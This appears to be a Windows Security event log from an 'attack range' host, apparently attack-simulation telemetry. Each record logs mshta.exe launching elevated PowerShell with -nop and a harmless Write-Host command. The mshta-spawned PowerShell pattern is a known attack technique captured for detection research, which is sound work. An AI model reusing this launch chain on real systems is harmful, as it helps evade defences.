"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 3d5ab335-407e-407c-af6f-fcab1f069bcb; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/24/2022 04:10:38 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-host-mhaag-attack-range-791 TaskCategory=Process Creation OpCode=Info RecordNumber=70773019 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0xB50CB Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1508 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x6bc Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host c043e024-bd3c-4d34-8f6e-e357df44ab6f; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/24/2022 04:10:26 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-host-mhaag-attack-range-791 TaskCategory=Process Creation OpCode=Info RecordNumber=70771643 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0xB50CB Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1b50 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x2b4 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 9c1ae3ee-75e1-41a1-b4bd-8d053b0e6c89; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 02/24/2022 04:10:02 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win-host-mhaag-attack-range-791 TaskCategory=Process Creation OpCode=Info RecordNumber=70769819 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0xB50CB Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1fe4 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xdc0 Creator Process Name: C:\Windows\System32\mshta.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 974a878e-dcd5-418a-ab1b-c4c043077cb5; Start-Sleep -Seconds 2; exit Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.